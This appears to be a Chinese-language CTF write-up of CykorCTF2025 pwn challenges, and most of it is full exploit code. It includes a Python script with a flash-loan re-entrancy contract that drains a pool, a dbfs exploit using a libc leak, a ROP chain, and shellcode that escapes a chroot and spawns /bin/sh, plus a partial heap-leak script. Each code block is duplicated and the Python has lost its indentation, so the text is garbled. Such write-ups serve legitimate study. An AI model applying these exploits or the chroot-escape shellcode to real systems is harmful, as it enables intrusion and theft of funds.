assets
0 KiB1970-01-01 07:59
README.mdx
10.4 KiB2025-12-08 15:31

#CykorCTF2025 Pwn 部分题解

#gram

内置的闪电贷合约有逻辑漏洞…

pub fn flash_loan(amount: u64, callback: address) {
    ...
    storage.current_loan = amount;
    transfer(callback, amount);
    ...
    sync_call(callback, "on_flash_loan", amount, repay_amount);
    let remaining: u64 = storage.current_loan;
    require(remaining == 0, "flash loan not repaid");
}
pub fn repay() {
    let received: u64 = msg.value;
    let loan: u64 = storage.current_loan;
    let fee: u64 = loan * fee_pct / 100;
    let required: u64 = loan + fee;
    require(received >= required, "insufficient repayment");
    storage.current_loan = 0;
}
pub fn flash_loan(amount: u64, callback: address) {
    ...
    storage.current_loan = amount;
    transfer(callback, amount);
    ...
    sync_call(callback, "on_flash_loan", amount, repay_amount);
    let remaining: u64 = storage.current_loan;
    require(remaining == 0, "flash loan not repaid");
}
pub fn repay() {
    let received: u64 = msg.value;
    let loan: u64 = storage.current_loan;
    let fee: u64 = loan * fee_pct / 100;
    let required: u64 = loan + fee;
    require(received >= required, "insufficient repayment");
    storage.current_loan = 0;
}

算是签到题了,像我这种区块链萌新都会做

from pwn import *
import re, hashlib, itertools

HOST = "43.203.37.155"
PORT = 58172

def leading_zero_bits(h: bytes) -> int:
for i, b in enumerate(h):
if b == 0:
continue
return i*8 + (8 - b.bit_length())
return len(h) * 8

def solve_pow(prev_hex: str, miner_hex: str, diff: int) -> int:
prev = bytes.fromhex(prev_hex)
miner = bytes.fromhex(miner_hex[2:])
for n in itertools.count():
h = hashlib.sha256(prev + miner + n.to_bytes(8, "little")).digest()
if leading_zero_bits(h) >= diff:
return n

def recv_prompt(r):
return r.recvuntil(b"> ")

def parse_banner(txt: str):
acc = re.search(r"Account:\s+(0x[0-9a-f]+)", txt).group(1)
pool = re.search(r"Pool:\s+(0x[0-9a-f]+)", txt).group(1)
flag = re.search(r"Flag:\s+(0x[0-9a-f]+)", txt).group(1)
return acc, pool, flag

def parse_work(txt: str):
prev = re.search(r"Previous hash:\s+([0-9a-f]+)", txt).group(1)
miner = re.search(r"Miner:\s+(0x[0-9a-f]+)", txt).group(1)
diff = int(re.search(r"Difficulty:\s+(\d+) leading zero bits", txt).group(1))
return prev, miner, diff

def main():
r = remote(HOST, PORT)
banner = recv_prompt(r).decode()
acc, pool, flag = parse_banner(banner)
log.info(f"acc={acc}, pool={pool}, flag={flag}")

balance = 0
while balance < 3:
r.sendline(b"getwork")
txt = r.recvuntil(b"Submit with: submit <nonce>\n")
txt += recv_prompt(r)
prev, miner, diff = parse_work(txt.decode())
nonce = solve_pow(prev, miner, diff)
log.info(f"found nonce {nonce} for diff {diff}")
r.sendline(f"submit {nonce}".encode())
out = recv_prompt(r).decode()
m = re.search(r"Balance:\s+(\d+) tokens", out)
if m:
balance = int(m.group(1))
log.info(f"balance now {balance}")

attack_code = f"""contract Attack {{
storage {{ owner: address, pool: address }}
pub fn init() {{
storage.owner = msg.sender;
storage.pool = {pool};
}}
pub fn on_flash_loan(amount: u64, repay_amount: u64) {{
let p: address = storage.pool;
if amount > 1 {{
sync_call(p, "flash_loan", 1, self.address); // 覆盖 current_loan 再清零
transfer(storage.owner, amount); // 偷走外层贷款
}} else {{
sync_call_with_value(p, "repay", repay_amount); // 偿还内层
}}
}}
}}
EOF
"""

r.sendline(b"code")
r.recvuntil(b"Enter contract code")
for line in attack_code.splitlines():
r.sendline(line.encode())
deploy_out = recv_prompt(r).decode()
m = re.search(r"Deployed:\s+(0x[0-9a-f]+)", deploy_out)
attack_addr = m.group(1)
log.info(f"attack deployed at {attack_addr}")

r.sendline(f"call {pool} flash_loan 49999 {attack_addr}".encode())
recv_prompt(r)

r.sendline(b"balance")
bal_out = recv_prompt(r).decode()
log.info("balance output:\n" + bal_out)

r.sendline(f"call {flag} claim_flag".encode())
final_out = recv_prompt(r).decode(errors="ignore")
print(final_out)

r.sendline(b"exit")
r.close()

if __name__ == "__main__":
main()
from pwn import *
import re, hashlib, itertools

HOST = "43.203.37.155"
PORT = 58172

def leading_zero_bits(h: bytes) -> int:
for i, b in enumerate(h):
if b == 0:
continue
return i*8 + (8 - b.bit_length())
return len(h) * 8

def solve_pow(prev_hex: str, miner_hex: str, diff: int) -> int:
prev = bytes.fromhex(prev_hex)
miner = bytes.fromhex(miner_hex[2:])
for n in itertools.count():
h = hashlib.sha256(prev + miner + n.to_bytes(8, "little")).digest()
if leading_zero_bits(h) >= diff:
return n

def recv_prompt(r):
return r.recvuntil(b"> ")

def parse_banner(txt: str):
acc = re.search(r"Account:\s+(0x[0-9a-f]+)", txt).group(1)
pool = re.search(r"Pool:\s+(0x[0-9a-f]+)", txt).group(1)
flag = re.search(r"Flag:\s+(0x[0-9a-f]+)", txt).group(1)
return acc, pool, flag

def parse_work(txt: str):
prev = re.search(r"Previous hash:\s+([0-9a-f]+)", txt).group(1)
miner = re.search(r"Miner:\s+(0x[0-9a-f]+)", txt).group(1)
diff = int(re.search(r"Difficulty:\s+(\d+) leading zero bits", txt).group(1))
return prev, miner, diff

def main():
r = remote(HOST, PORT)
banner = recv_prompt(r).decode()
acc, pool, flag = parse_banner(banner)
log.info(f"acc={acc}, pool={pool}, flag={flag}")

balance = 0
while balance < 3:
r.sendline(b"getwork")
txt = r.recvuntil(b"Submit with: submit <nonce>\n")
txt += recv_prompt(r)
prev, miner, diff = parse_work(txt.decode())
nonce = solve_pow(prev, miner, diff)
log.info(f"found nonce {nonce} for diff {diff}")
r.sendline(f"submit {nonce}".encode())
out = recv_prompt(r).decode()
m = re.search(r"Balance:\s+(\d+) tokens", out)
if m:
balance = int(m.group(1))
log.info(f"balance now {balance}")

attack_code = f"""contract Attack {{
storage {{ owner: address, pool: address }}
pub fn init() {{
storage.owner = msg.sender;
storage.pool = {pool};
}}
pub fn on_flash_loan(amount: u64, repay_amount: u64) {{
let p: address = storage.pool;
if amount > 1 {{
sync_call(p, "flash_loan", 1, self.address); // 覆盖 current_loan 再清零
transfer(storage.owner, amount); // 偷走外层贷款
}} else {{
sync_call_with_value(p, "repay", repay_amount); // 偿还内层
}}
}}
}}
EOF
"""

r.sendline(b"code")
r.recvuntil(b"Enter contract code")
for line in attack_code.splitlines():
r.sendline(line.encode())
deploy_out = recv_prompt(r).decode()
m = re.search(r"Deployed:\s+(0x[0-9a-f]+)", deploy_out)
attack_addr = m.group(1)
log.info(f"attack deployed at {attack_addr}")

r.sendline(f"call {pool} flash_loan 49999 {attack_addr}".encode())
recv_prompt(r)

r.sendline(b"balance")
bal_out = recv_prompt(r).decode()
log.info("balance output:\n" + bal_out)

r.sendline(f"call {flag} claim_flag".encode())
final_out = recv_prompt(r).decode(errors="ignore")
print(final_out)

r.sendline(b"exit")
r.close()

if __name__ == "__main__":
main()

#dbfs

出题人给了源码,实现了一个简单的文件系统:

  • SET <name> <type> [value]: 创建键或目录
  • GET <name>: 获取键值或列出目录内容
  • DELETE <name>: 删除键或目录
  • INFO <name>: 显示键或目录的详细信息
  • CHDIR <name>: 切换当前目录

handler_info 函数里,下面这段代码存在栈溢出漏洞:

getcwd(full_path, sizeof(full_path));
strcat(full_path, "/");
strcat(full_path, name);
getcwd(full_path, sizeof(full_path));
strcat(full_path, "/");
strcat(full_path, name);

strcat 没有做长度检查。但是问题是 strcat 默认会用 \x00 结尾,导致无法利用下面的 printf 泄漏地址,所以尝试找别的洞。

hex2bytes

审计了一会发现 hex2bytes 函数里,如果输入非法的 hex 这里解析会失败,导致堆块里残留的地址不会被覆盖掉,所以风水一下搞个 libc 地址就可以了。

然后在打 rop 的时候会发现 payload 里不能出现 \x00,不然会截断导致报错。写个栈迁移到堆上即可。

后续打 orw,但是题目执行前 chroot 了,得先逃逸。

程序 chroot 到 /tmp 了,所以 open 失败,ls 只能看到 . 和 ..

完整 exp 如下:

# code by littflower.
from pwn import *
from sys import argv

proc = "./client"
context.log_level = "debug"
context.binary = proc
elf = ELF(proc, checksec=False)
io = remote("43.203.37.155", 22222) if argv[1] == 'r' else process(proc)
libc = ELF("./libc.so.6")

if args.G:
gdb.attach(io)


def cmd(c):
io.sendlineafter(b"dbfs> ", c)


dir_name = b"A" * 255
deep_levels = 18

victimA = b"x" * 0xd0
cmd(f"SET {victimA} bytes ".encode() + b"A" * 0x400)
cmd(b"SET barrier bytes " + b"Z" * 0x100)
cmd(b"GET barrier")
io.recvuntil(b"Value (hex): ")
libc.address = u64(bytes.fromhex(io.recv(16).decode())) - 0x203f70
io.recv(16)
heap_base = u64(bytes.fromhex(io.recv(16).decode()))
log.info(f"libc.address => {hex(libc.address)}\nheap_addr => {hex(heap_base)}")

pop_rdi_ret = libc.address + 0x000000000010f78b
pop_rsi_ret = libc.address + 0x0000000000110a7d
pop_rax_ret = libc.address + 0x00000000000dd237
pop_rdx_ret = libc.address + 0x00000000000ab8a1
pop_rcx_ret = libc.address + 0x00000000000a877e
call_rax = libc.address + 0x000000000002a1c8
mprotect = libc.sym['mprotect']
ret = pop_rdi_ret + 1
rop = flat([pop_rdi_ret, (heap_base) & 0xfffffffffffff000, pop_rsi_ret, 0x3000, pop_rcx_ret, heap_base, pop_rdx_ret, 7, mprotect, pop_rax_ret, heap_base + 0x1498, call_rax])

escape_shellcode = f"""
_start:
xor rax, rax
push rax
mov rax, 0x637365
push rax
mov rdi, rsp
mov rsi, 0x1ed
mov rax, 83
syscall

mov rdi, rsp
mov rax, 161
syscall
test rax, rax
js exit_process

xor rax, rax
mov ax, 0x2e2e
push rax
mov rbx, 50

escape_loop:
mov rdi, rsp
mov rax, 80
syscall
dec rbx
jnz escape_loop

mov word ptr [rsp], 0x2e
mov rdi, rsp
mov rax, 161
syscall

xor rdx, rdx
xor rsi, rsi
mov rax, 0x68732f6e69622f
push rax
mov rdi, rsp
mov rax, 59
syscall

exit_process:
mov rax, 60
xor rdi, rdi
syscall
"""

orw = asm(escape_shellcode)
for i in range(deep_levels):
suffix = ("%02d" % i).encode()
name = dir_name[:-len(suffix)] + suffix
cmd(b"SET " + name + b" set")
cmd(b"CHDIR " + name)

victimB = b"V" * 0xbf + p64(heap_base + 0x1430)[:-2]
log.info(f"mprotect => {hex(mprotect)}")

reread = asm(shellcraft.read(0, "rsp", 0x300))
cmd(b"SET " + victimB + " bytes ".encode() + b"K" * 8 + rop + reread.ljust(0x100, b"A"))
pause()
cmd(b"INFO " + victimB)
pause()
io.sendline(b"\x90" * 0x20 + orw)
io.interactive()
# code by littflower.
from pwn import *
from sys import argv

proc = "./client"
context.log_level = "debug"
context.binary = proc
elf = ELF(proc, checksec=False)
io = remote("43.203.37.155", 22222) if argv[1] == 'r' else process(proc)
libc = ELF("./libc.so.6")

if args.G:
gdb.attach(io)


def cmd(c):
io.sendlineafter(b"dbfs> ", c)


dir_name = b"A" * 255
deep_levels = 18

victimA = b"x" * 0xd0
cmd(f"SET {victimA} bytes ".encode() + b"A" * 0x400)
cmd(b"SET barrier bytes " + b"Z" * 0x100)
cmd(b"GET barrier")
io.recvuntil(b"Value (hex): ")
libc.address = u64(bytes.fromhex(io.recv(16).decode())) - 0x203f70
io.recv(16)
heap_base = u64(bytes.fromhex(io.recv(16).decode()))
log.info(f"libc.address => {hex(libc.address)}\nheap_addr => {hex(heap_base)}")

pop_rdi_ret = libc.address + 0x000000000010f78b
pop_rsi_ret = libc.address + 0x0000000000110a7d
pop_rax_ret = libc.address + 0x00000000000dd237
pop_rdx_ret = libc.address + 0x00000000000ab8a1
pop_rcx_ret = libc.address + 0x00000000000a877e
call_rax = libc.address + 0x000000000002a1c8
mprotect = libc.sym['mprotect']
ret = pop_rdi_ret + 1
rop = flat([pop_rdi_ret, (heap_base) & 0xfffffffffffff000, pop_rsi_ret, 0x3000, pop_rcx_ret, heap_base, pop_rdx_ret, 7, mprotect, pop_rax_ret, heap_base + 0x1498, call_rax])

escape_shellcode = f"""
_start:
xor rax, rax
push rax
mov rax, 0x637365
push rax
mov rdi, rsp
mov rsi, 0x1ed
mov rax, 83
syscall

mov rdi, rsp
mov rax, 161
syscall
test rax, rax
js exit_process

xor rax, rax
mov ax, 0x2e2e
push rax
mov rbx, 50

escape_loop:
mov rdi, rsp
mov rax, 80
syscall
dec rbx
jnz escape_loop

mov word ptr [rsp], 0x2e
mov rdi, rsp
mov rax, 161
syscall

xor rdx, rdx
xor rsi, rsi
mov rax, 0x68732f6e69622f
push rax
mov rdi, rsp
mov rax, 59
syscall

exit_process:
mov rax, 60
xor rdi, rdi
syscall
"""

orw = asm(escape_shellcode)
for i in range(deep_levels):
suffix = ("%02d" % i).encode()
name = dir_name[:-len(suffix)] + suffix
cmd(b"SET " + name + b" set")
cmd(b"CHDIR " + name)

victimB = b"V" * 0xbf + p64(heap_base + 0x1430)[:-2]
log.info(f"mprotect => {hex(mprotect)}")

reread = asm(shellcraft.read(0, "rsp", 0x300))
cmd(b"SET " + victimB + " bytes ".encode() + b"K" * 8 + rop + reread.ljust(0x100, b"A"))
pause()
cmd(b"INFO " + victimB)
pause()
io.sendline(b"\x90" * 0x20 + orw)
io.interactive()

#shortcut

牢了最久的题。。

  • add delete run 时进行 overlap 检查
  • add 最多 8 个,大小固定 0x20,不限机会,但 run 之后不可用,必须先 reload
  • delete 功能释放所有堆块,最后一个槽位指针不置 0,两次机会
  • run 可以显示堆块内容并释放 img chunk,两次机会
  • reload 分配 img chunk,两次机会
  • rename 分配 0x30,并可控 0x10,一次机会

然后我写了一个泄漏 libc 和 heap base 的 exp 如下:

#!/usr/bin/env python3

from pwn import *
from sys import argv
import binascii
import struct

proc = "./shortcut_patched"
context.log_level = "debug"
context.binary = proc
elf = ELF(proc, checksec=False)
libc = ELF("./libc.so.6", checksec=False)
io = remote("", ) if len(argv) > 1 and argv[1] == 'r' else process(proc)

if args.G:
gdb.attach(io, """
breakrva 0x244a
""")


def build_png():
sig = b"\x89PNG\r\n\x1a\n"
ihdr_data = p32(1, endian="big") + p32(1, endian="big") + b"\x08\x02\x00\x00\x00" # 1x1 RGB
ihdr_body = b"IHDR" + ihdr_data
ihdr = p32(len(ihdr_data), endian="big") + ihdr_body + p32(binascii.crc32(ihdr_body), endian="big")
iend_body = b"IEND"
iend = p32(0, endian="big") + iend_body + p32(binascii.crc32(iend_body), endian="big")
png = sig + ihdr + iend
return png.ljust(2016, b"A")


def choose(idx):
io.sendlineafter(b"> ", str(idx).encode())


def add(idx, buf):
choose(1)
io.sendlineafter(b'slot index (0~7)? ', str(idx).encode())
io.sendafter(f'send exactly 16 bytes for filter[{idx}]\n'.encode(), buf)


def delete():
choose(2)


def run(size, buf):
choose(3)
io.sendlineafter(b'watermark length (0~32)? ', str(size).encode())
if size:
io.sendafter(b'send 32 bytes for watermark\n', buf)


def reload():
choose(4)
# io.send(b"\x89\x50\x4e\x47\x0d\x0a\x1a\x0a" + cyclic(2016 - 8, n=8))
io.send(build_png())


def rename():
choose(5)


def name(buf):
io.recvuntil(b"What is your name?\n")
io.sendline(buf)
io.recvuntil(b": ")
leak = int(io.recvuntil(b"\n", drop=True).decode(), 16)
return leak


def leak():
io.recvuntil(b"fiLT\x80")
return u64(io.recv(8))


main_addr = name(b"aaa")
pie_addr = main_addr - 0x24f5
log.info(f"pie_addr => {hex(pie_addr)}")
io.send(build_png())


for i in range(8):
add(i, b"A"*16)
delete()
run(0, b"")
heap_base = leak() << 12
reload()
run(0, b"")
libc.address = leak() - 0x203b20
log.info(f"libc_addr => {hex(libc.address)}\nheap_base => {hex(heap_base)}")

reload()
# delete()
# rename()
# for i in range(6):
# add(i, b"A" * 16)
io.interactive()
#!/usr/bin/env python3

from pwn import *
from sys import argv
import binascii
import struct

proc = "./shortcut_patched"
context.log_level = "debug"
context.binary = proc
elf = ELF(proc, checksec=False)
libc = ELF("./libc.so.6", checksec=False)
io = remote("", ) if len(argv) > 1 and argv[1] == 'r' else process(proc)

if args.G:
gdb.attach(io, """
breakrva 0x244a
""")


def build_png():
sig = b"\x89PNG\r\n\x1a\n"
ihdr_data = p32(1, endian="big") + p32(1, endian="big") + b"\x08\x02\x00\x00\x00" # 1x1 RGB
ihdr_body = b"IHDR" + ihdr_data
ihdr = p32(len(ihdr_data), endian="big") + ihdr_body + p32(binascii.crc32(ihdr_body), endian="big")
iend_body = b"IEND"
iend = p32(0, endian="big") + iend_body + p32(binascii.crc32(iend_body), endian="big")
png = sig + ihdr + iend
return png.ljust(2016, b"A")


def choose(idx):
io.sendlineafter(b"> ", str(idx).encode())


def add(idx, buf):
choose(1)
io.sendlineafter(b'slot index (0~7)? ', str(idx).encode())
io.sendafter(f'send exactly 16 bytes for filter[{idx}]\n'.encode(), buf)


def delete():
choose(2)


def run(size, buf):
choose(3)
io.sendlineafter(b'watermark length (0~32)? ', str(size).encode())
if size:
io.sendafter(b'send 32 bytes for watermark\n', buf)


def reload():
choose(4)
# io.send(b"\x89\x50\x4e\x47\x0d\x0a\x1a\x0a" + cyclic(2016 - 8, n=8))
io.send(build_png())


def rename():
choose(5)


def name(buf):
io.recvuntil(b"What is your name?\n")
io.sendline(buf)
io.recvuntil(b": ")
leak = int(io.recvuntil(b"\n", drop=True).decode(), 16)
return leak


def leak():
io.recvuntil(b"fiLT\x80")
return u64(io.recv(8))


main_addr = name(b"aaa")
pie_addr = main_addr - 0x24f5
log.info(f"pie_addr => {hex(pie_addr)}")
io.send(build_png())


for i in range(8):
add(i, b"A"*16)
delete()
run(0, b"")
heap_base = leak() << 12
reload()
run(0, b"")
libc.address = leak() - 0x203b20
log.info(f"libc_addr => {hex(libc.address)}\nheap_base => {hex(heap_base)}")

reload()
# delete()
# rename()
# for i in range(6):
# add(i, b"A" * 16)
io.interactive()

还有一次 delete 和一次 reload 的机会

这里可以做一个 chunk 同时在 tcache 和 smallbin,然后打 tsu+ 即可。

#AKVC

= =